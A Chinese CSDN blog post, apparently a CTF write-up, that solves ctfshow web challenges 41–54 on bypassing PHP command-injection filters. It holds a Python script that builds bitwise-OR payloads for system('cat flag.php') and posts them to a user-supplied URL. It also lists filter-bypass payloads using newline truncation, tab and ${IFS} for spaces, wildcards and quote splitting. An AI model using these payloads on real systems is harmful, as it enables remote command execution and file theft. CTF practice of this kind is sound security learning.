命令执行篇2(web41-54)

已于 2024-09-26 12:57:03 修改
阅读量365 收藏 8
点赞数 5
分类专栏: ctfshow web刷题记录 文章标签: 网络安全 python web安全
于 2024-09-26 10:52:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_72929232/article/details/142549734
版权

8.web41

留下了"|"运算符可以用没被过滤的字符通过或运算拼出我们想用的字符

用的羽师傅的脚本

ctfshow web入门 web41_ctfshow web41-CSDN博客

# 导入正则表达式模块
import re
# 导入urllib模块:用于处理URL的模块。
import urllib
# 从urllib模块中导入parse模块:urllib模块的一部分,用于解析URL。
from urllib import parse
# 导入requests模块:用于发送HTTP请求的模块。
import requests

contents = []

# 遍历0-255的整数
for i in range(256):
    for j in range(256):
        # 将整数转换为16进制字符串,不足两位前面补0
        hex_i = '{:02x}'.format(i)
        hex_j = '{:02x}'.format(j)
        # 定义正则表达式,匹配数字、小写字母、大写字母、^、+、~、$、[、]、{、}、&
        preg = re.compile(r'[0-9]|[a-z]|\^|\+|~|\$|\[|]|\{|}|&|-', re.I)
        # 如果i或j对应的字符匹配正则表达式,则跳过
        if preg.search(chr(int(hex_i, 16))) or preg.search(chr(int(hex_j, 16))):
            continue
        else:
            # 将16进制字符串转换为字符
            a = '%' + hex_i
            b = '%' + hex_j
            # 对应字符进行按位或运算
            c = chr(int(a[1:], 16) | int(b[1:], 16))
            # 如果结果字符的ASCII码在32-126之间,则添加到contents列表中
            if 32 <= ord(c) <= 126:
                contents.append([c, a, b])


# 定义一个函数,用于生成payload
def make_payload(cmd):
    # 初始化两个空字符串
    payload1 = ''
    payload2 = ''
    # 遍历cmd中的每个字符
    for i in cmd:
        # 遍历contents中的每个元素
        for j in contents:
            # 如果cmd中的字符与contents中的第一个元素相等
            if i == j[0]:
                # 将contents中的第二个元素添加到payload1中
                payload1 += j[1]
                # 将contents中的第三个元素添加到payload2中
                payload2 += j[2]
                # 跳出内层循环
                break
    # 将payload1和payload2用双引号括起来,并用竖线连接
    payload = '("' + payload1 + '"|"' + payload2 + '")'
    # 返回生成的payload
    return payload

URL = input('url:')
# 构造payload,包含system和cat flag.php命令
payload = make_payload('system') + make_payload('cat flag.php')
# 发送POST请求,将payload作为参数,urllib.parse.unquote函数用于解码URL编码的字符串。
response = requests.post(URL, data={'c': urllib.parse.unquote(payload)})
# 打印响应内容
print(response.text)

下面是一个具体的例子

9.web42



ctfshow-web入门-命令执行(web42知识铺垫与四种常见截断方法)_分号截断命令执行-CSDN博客

system($c." >/dev/null 2>&1"); // 执行变量$c中包含的命令,并将输出重定向到/dev/null,这意味着不显示任何执行结果

10.web43

nl flag.php%0a 然后查看源代码(nl 命令在 Linux 中用于显示文件内容并加上行号

或者c=tac flag.php%0a

11.web44

c=tac fla*%0a

12.web45(多过滤了空格)

空格可用%09(tab键)绕过

13.web46

?c=tac<fla%27%27g.php||(?c=tac<fla''g.php||或者?c=nl<fla''g.php||  nl需要查看源代码)

url/?c=tac%09fla?.php||

14.web47到web50类似

?c=tac<f''lag.php||

?c=ca\t<fl\ag.php||

url/?c=tac%09fla?.php||

?c=tac%09fl\ag.php||

?c=tac%09fla?.php%26%26ls

15.web52,53

用$IFS或者${IFS}代替空格

ctfshow WEB入门 命令执行29-77&118-122&124_ctfshow web29-CSDN博客

16.web54

?c=cp${IFS}???g.php${IFS}t.txt

grep命令将在名为flag.php的文件中搜索包含ctfshow文本的行。

影杀~
关注
专栏目录
ART OF WEB-SQL-INJECTION第2卷 ORACLE
09-14
)来执行多个SQL命令。然而,通过使用PL/SQL(Oracle的编程语言)和特定的工具,可以间接实现多语句执行。PL/SQL允许开发者编写过程和函数,其中可能包含SQL命令,这可能导致潜在的安全风险。 攻击者可能会利用用户...
ctfshow-web41~60-WP
02-21
文章主要关注的是CTFShow中的Web挑战第41至60题的解题思路与技术细节,尤其是题目41中的命令注入攻击。 #### 题目背景与目标 在题目41中,参与者需要分析给定的PHP代码片段,理解其逻辑并找到漏洞所在。目标是...
第二节 Windows命令执行漏洞利用技巧-01
09-15
文章对Windows命令执行漏洞利用技巧进行了详细的讲解,包括命令执行示例代码分析、命令执行漏洞利用思路、命令执行漏洞拼接符介绍和命令执行漏洞利用演示。这些技术可以使攻击者绕过系统的安全检查,从而执行...
rust-web-view-demo:使用Svelte进行Rust网页浏览
05-23
文章将深入探讨如何利用Rust的低级性能优势与Svelte的高效前端框架特性,构建一个名为“rust-web-view-demo”的项目。该项目展示了如何在Rust环境中集成JavaScript的Svelte库,实现一个功能完善的Web视图应用。 ...
WEB安全-杂类知识.pptx
08-24
主要探讨了两个核心主题:Webshell和NTFS文件流,它们在Web安全中扮演着重要的角色。 首先,Webshell,也称为网页后门,是一种恶意代码,黑客通过它可以在目标服务器上执行命令、上传/下载文件,甚至控制整个...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8508
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
pandas中数据子集的获取
weixin_43597208的博客
10-14 475
通常,在pandas模块中实现数据框子集的获取可以使用iloc、loc和ix三种方法,这三种方法既可以对数据行进行筛选,也可以实现变量的筛选,它们的语法可以表示成[rows_select,cols_select]。iloc只能通过行号和列号进行数据的筛选,可以将iloc中的i理解为’integer’,即只能向[rows_select,cols_select]指定整数列表该索引方式与数组的索引方式类似,都是从0开始,可以间隔取号,对于切片仍然无法取到上限。
Python编程实例-猜数字游戏
视觉与物联智能
10-17 65
每个人都喜欢玩游戏。数字游戏既有趣又对大脑活动有益。在本文中,我们将使用Python创建一个有趣的数字猜谜游戏
一个检查OpenEuler版本的Python脚本的意义与实现
cgqyw的专栏
10-16 185
在系统管理和运维工作中,确定操作系统的版本是一个常见且关键的任务。特别是在需要针对特定版本的操作系统进行部署、配置或升级时,准确地识别系统版本至关重要。OpenEuler作为一个开源的服务器操作系统,因其高性能、高可靠性、高安全性以及丰富的软件生态,逐渐受到越来越多企业和开发者的青睐。本文将介绍一个Python脚本,该脚本旨在检查系统是否为OpenEuler 22.03版本。我们将探讨编写此脚本的意义,并详细展示其实现代码。
目标检测系统中需要【重新训练模型】说明
2401_85556416的博客
10-13 437
打开"ultralytics\cfg\datasets\SODA10M.yaml"文件。将SODA10M.yaml的第一行数据集路径修改为自己数据集路径。以【基于YOLOv8的车辆行人目标检测系统】训练为例进行说明。训练模型的权重保存路径在"runs\detect\train\weights"目录下。给出的项目中已包含训练好的模型以及训练的结果,可直接使用。(3)运行main_model_train.py程序。(1)如果环境还没有搭建好的,首先要搭建训练环境。(4)训练模型保存路径。
Python 使用 Jarvis 算法或包装的凸包(Convex Hull using Jarvis’ Algorithm or Wrapping)
csdn_aspnet的专栏
10-14 1221
例如,当输入 (0, 3), (0, 0), (0, 1), (3, 0), (3, 3) 时,它产生 (0, 3) (0, 0) (3, 0) (3, 3) 的输出;当输入 (0, 3), (0, 1), (0, 0), (3, 0), (3, 3) 时,输出为 (0, 3) (0, 1) (0, 0) (3, 0) (3, 3)。下一个点被选为在逆时针方向上领先于所有其他点的点,即,如果对于任何其他点 r,我们有“orientation(p, q, r) = 逆时针”,则下一个点是 q。
计算机毕业设计Python深度学习房价预测 房源可视化 房源爬虫 二手房可视化 二手房爬虫 递归决策树模型 机器学习 深度学习 大数据毕业设计
全网粉丝100W+、全栈领域优质创作者、B站、github、CSDN等社区技术专家、专注于高端精品毕业项目源码实战
10-18 531
计算机毕业设计Python深度学习房价预测 房源可视化 房源爬虫 二手房可视化 二手房爬虫 递归决策树模型 机器学习 深度学习 大数据毕业设计
10月下半记录
cqbzcsq的博客
10-14 158
之后又出现了这种情况,reload window的时候突然断连了,关掉terminal之后再进行reload window就又好了,很奇怪,可能是vscode选择环境和conda出现了一些冲突。indices和data的长度均为矩阵中的非零值个数,indtpr长度为矩阵行数+1且单调不降,且最后一个值等于矩阵中的非零值个数。则说明data[0,1)的值a在第一行,data[1,4)的值bcd在第二行,data[4,8)的值efgh在第三行,第四行没有值。之前都可以正常连接,但是突然就不对了。
python入门到精通专题】8.装饰器
情不知所起一往而深
10-13 792
什么是property属性?一种用起来像是使用的实例属性一样的特殊属性,可以对应于某个方法。class Foo:pass# 定义property属性@propertypassfoo_obj.func() # 调用实例方法foo_obj.prop # 调用property属性@propertyreturn 100定义时,在实例方法的基础上添加 @property 装饰器;并且仅有一个self参数调用时,无需括号。
python中while 1表示什么
hakesashou的博客
10-16 249
while '1',while [1, 2],while (1, 2),while x,只要len(x)>0,就是条件永远为真,等价于while True。像while 1,while 2,while -1,while -2,while x,只要x不等于0,就是条件永远为真,等价于while True。while '',while [],while (),while x,只要len(x)=0,就是条件永远不为真,等价于 while False。while 0 等价于 while False。
matplotlib基本使用
正在学算法的小朋友的博客
10-14 270
选自于鱼书代码部分。
Pytest自动化测试框架之Allure报告
HUA6911的博客
10-14 614
Allure Framework是一种灵活的、轻量级、多语言测试报告工具。不仅可以以简洁的网络报告形式非常简洁地显示已测试的内容,而且还允许参与开发过程的每个人从日常执行中提取最大程度的有用信息和测试。Allure报告可以快速查看到缺陷点,可以将测试未通过划分为Bug和中断的测试。还可以配置日志,步骤,固件,附件,时间,历史记录,以及与TMS的集成和Bug跟踪系统,以便掌握所有信息。Allure提供了一个清晰的全局,涵盖了所涵盖的功能,缺陷聚集的位置,执行时间表,以及许多其他方便的事情。
外包干了3周,技术退步太明显了。。。。。
chengxuyuznguoke的博客
10-17 2699
先说一下自己的情况,大专生,21年通过校招进入武汉某软件公司,干了差不多3个星期的功能测试,
Python Logging 模块
最新发布
holer的博客
10-19 475
日志在需要大规模改造程序的内部构造时很有用,它无疑能够帮助你发现问题和bug。日志大致上就是收集与程序运行相关的数据,供你事后进行研究或积累。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值